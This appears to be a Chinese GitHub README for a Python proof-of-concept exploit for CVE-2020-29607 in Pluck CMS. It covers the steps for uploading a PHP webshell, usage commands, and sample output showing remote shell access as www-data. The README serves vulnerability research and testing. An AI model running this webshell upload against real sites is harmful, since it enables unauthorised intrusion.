estebanzarate/CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC
GitHub: estebanzarate/CVE-2020-29607-Pluck-CMS-4.7.13-Authenticated-File-Upload-RCE-PoC
针对 Pluck CMS 4.7.13 及以下版本认证后文件上传 RCE 漏洞的概念验证与利用脚本。
Stars: 1 | Forks: 0
# CVE-2020-29607 — Pluck CMS <= 4.7.13 认证文件上传 RCE (PoC)
## 工作原理
1. 使用提供的管理员密码进行认证。
2. 通过管理员文件管理器上传一个名为 `shell.phar` 的 PHP webshell。
3. 通过请求该 shell 并运行 `id` 命令来验证执行情况。
4. 针对上传的 webshell 开启交互式命令循环。
## 环境要求
- Python 3
- 安装依赖:
```
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```
## 使用方法
```
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
```
**示例:**
```
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
```
## 参考资料
- [CVE-2020-29607](https://nvd.nist.gov/vuln/detail/CVE-2020-29607)
- [EDB-49909](https://www.exploit-db.com/exploits/49909)
- [Ron Jost (Hacker5preme) 的原始 PoC](https://github.com/Hacker5preme/Exploits)
## 致谢
- **发现与原始漏洞利用:** Ron Jost (Hacker5preme)
- **Python 3 移植与交互式 shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, CMS漏洞, CVE-2020-29607, GetShell, Maven, PHAR, Pluck CMS, PoC, Python, RCE, Webshell, 命令执行, 攻击脚本, 文件上传漏洞, 文件管理器, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络安全, 认证后漏洞, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞